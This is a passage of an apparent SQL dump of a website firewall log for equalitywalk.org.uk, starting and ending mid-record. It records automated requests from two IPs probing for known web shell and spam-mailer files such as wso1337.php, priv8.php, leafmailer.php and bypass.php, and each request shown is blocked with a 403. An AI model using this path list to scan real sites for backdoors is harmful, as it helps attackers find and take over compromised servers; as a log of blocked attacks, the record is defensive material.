3.5.30729)\"}','zawtuo4UPyFLZHG9crO1Bimv',0,1674422536.8061,106,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/10.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','x8fcFQK6BpXCOeb07El2vmhW',0,1674422537.6226,119,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','kVSDqtKEp9UGduxB8rOAwja2',0,1674422538.4485,85,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OabS031YxVQcLdUR8CBlMush',0,1674422539.2242,149,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/e.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','vqQrLh7onxu0FGAj8lHdTegR',0,1674422540.0829,102,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/r.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','MBoL5fR2ZTC8GSAwsYePNdcU',0,1674422540.9047,89,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/t.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','TWNaAom5HnJVC6w7M2dRpUlr',0,1674422541.6869,95,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/y.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lmVW5jN4nhy0AIRYzB2ZDfkJ',0,1674422542.4841,92,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/u.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','6C4eNvdApmu7X1YL8SxUMkE5',0,1674422543.2760,102,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','dnHB3wlXT68PJsargZq5bQNu',0,1674422544.0600,124,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','WzY6qNJVhxS7DfKeoGHLm9uI',0,1674422544.8678,92,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/p.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','hFxa2UQl30vfL56qwK8EBp7O',0,1674422545.6700,134,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/q.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lR7dYJgOc9mF0fbvje4tWNPG',0,1674422546.5087,96,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/s.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HWME8Zi7FUkhcR0ea2fJA1bv',0,1674422547.3079,105,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/d.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','eWFvOKiz0fxN3BAt78G2lIV1',0,1674422548.1081,115,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3bwio2FvQJ7Na1EXSgfrIsyG',0,1674422548.9339,105,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3HQaDFCg52GZT1cylOkpzINx',0,1674422549.7515,110,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/h.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','jrxuO2EkTFUNXAdzCaJHIYq9',0,1674422550.5591,133,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/j.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','v49s2juTBcGqQNdAXP81mglI',0,1674422551.5354,92,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0nBiDYvgWFZ7kya8cXsQol9e',0,1674422552.3262,97,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/l.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','eRr0mZH7ufkN8JbTp4IMKAzw',0,1674422553.1391,104,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','6WYN29GrocFd37Xx4ClOav1K',0,1674422553.9638,117,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4DmrgE9QsAofRvxuVGHNYjih',0,1674422554.7872,127,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nR2OvdGcVf4bEaNFKS8X7HIm',0,1674422555.6606,104,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/n.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','eJrYvDsxMCy21inAUVtQkuRq',0,1674422556.4808,131,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1wi5lfxJIgsjU2YbZ4a6n8dt',0,1674422557.3096,98,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ZVlcRH6FqkjAP03WhDQBasmE',0,1674422558.1027,101,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','kTKwugLnH4qZEJ5GBNxsQM6I',0,1674422561.1062,101,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','uaEdhlJjIQZyHUTn2foKg0q4',0,1674422561.9035,92,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/minimo.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','kcS1bewW2LMitIpQqdZGjTPJ',0,1674422562.6879,125,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/V3.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','PTVcW6lmzpRCL0oOIUekiruS',0,1674422563.5096,99,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/V5.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','b3HLrltcROqzgYZeu15KIn2v',0,1674422564.2993,92,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/www.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','SLXnmKl1MaqpW2Fbg9UN4oIu',0,1674422565.0790,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','cG1yV4jbLqgYJwmiD7AsaNzZ',0,1674422565.8681,167,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/777.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1ug6s8yhMNpw7FT0lRGvk3mU',0,1674422566.7596,112,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pxlBVU7skTmqtXCJ0uQGOaig',0,1674422567.5799,101,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/xox.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','bejfyxXNz1CK4oiMEtITZRHc',0,1674422568.3763,90,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','rlOKH4GbhU6NwjMSDBkAf9dV',0,1674422569.1781,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wi.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7jbvpiynZYlTBCHzaUI089c6',0,1674422569.9518,108,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','MRwcOQ4UFKpJBtWenZT7jzSN',0,1674422570.7625,102,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/root.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qAgTtnGv2o7lj16HhdExZwu8',0,1674422571.5646,83,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/nee.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','oNigEIhz5W94M2Z7pakLSVFY',0,1674422572.3538,99,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3STWGJhZ7o5v6gRIKUpHFAkd',0,1674422573.1604,97,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/lol.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','RSXVnwpbCmWsMjPZ8xf3YeHi',0,1674422573.9595,112,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/87.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','z8DOAY3Lht4sVPdKbk1Rw0lS',0,1674422574.7834,121,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/7yn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','LWb8cR1hp9nDkfqNy5to0Qgd',0,1674422575.6241,85,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KCTmtWDyxJpb7XYeIBA1zRcn',0,1674422576.3974,124,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/13.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','b8u7hp9AIlWmvEwQqTzLnD6B',0,1674422577.5536,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/FoxWSOv1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JUmnwjyhOtMXzxulLbkdaW0A',0,1674422578.3506,112,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','SYObt5v83HnwLGaNfXM9AzkP',0,1674422579.1849,105,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','f705PVqB6js1JEQLDwu9oy8N',0,1674422579.9870,96,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lxWm2zRY4Dd8VfwvNHaMPjb6',0,1674422580.7777,130,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/WSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OcSomA8xPbpuMYN31vDrHzqf',0,1674422581.6166,131,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','huYoRyMXPnB87vGaFjfZbdxq',0,1674422582.4721,88,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/if.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','MVoASxGtnsL7buvUc3zHFDli',0,1674422583.2676,92,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/kk.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','wxEZtspAkU8Wy2735gjoRBKD',0,1674422584.0533,127,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/mrjn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','L9OfSZK7ptwoyznXeqjCkPTE',0,1674422584.9000,85,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/kn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Sv1xL5Vy6qAwFebTnXZIk2Qz',0,1674422585.6876,115,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/3301.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VS76FfcU5uX0lIRYE8tq2ajb',0,1674422586.5025,95,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3oYkL1ySTj4n9bsZcvqwPuJA',0,1674422587.3099,86,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ZsBmjuKwC4So9crJpqM27hvA',0,1674422588.1029,96,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ZVEnPQbkvLXrF9HORpYwiC3m',0,1674422588.8924,106,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/anone.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','btDLh5A49WPJ17KZEBsXcMnR',0,1674422589.7288,91,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','m7ay8A13cbIz2xt6YPe0QhBd',0,1674422590.5546,180,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-ad.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','seDjn6ZM7uo1ElVaXycbmIf0',0,1674422591.5204,87,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','5DFit0RuzxgcGHvNWX7CfJ6n',0,1674422592.3007,91,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/.wp-cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','yzCQS9mfjhDRFxep6UwqWY34',0,1674422593.1055,89,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/sendmail.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','yS5LwaVP2e40gRtoHNxviJGj',0,1674422593.9066,107,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/rahma.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','t50IRmM7wYi9jKgavqcJWnyp',0,1674422594.7236,110,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/nasgor.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','dkeC3pbnHtw5RVMPgcYajJ1y',0,1674422595.5415,90,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-confirm.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KI7TezfWNwMAnCm9LPlJQEjU',0,1674422596.3261,148,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alfa123.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1kMW8dUouap2GRZ3Fc0NstIB',0,1674422597.1643,114,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','WMoSExtTRLJwA5s3ly2HBFq1',0,1674422597.9796,90,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','rQjGazhqkHLVnEiT238U9XAo',0,1674422598.7722,93,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-one.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','GmACvX152FkLfVWKicPj8MDR',0,1674422599.5802,96,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alexus.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','szDpfrnBmRCxMPuNdV4Ecq7a',0,1674422600.3923,99,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wso1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7HiGKh20BeNqgsujbOdWX5R3',0,1674422601.1882,115,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rFkWMaRhBlH640qjIJ2tvpud',0,1674431367.0118,142,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','69TyMLIFXdxRmKshYquWPti1',0,1674431367.9152,138,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OJ0aGq3ZVLoDeFu6WC9Nx1Y5',0,1674431368.8119,115,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.equalitywalk.org.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 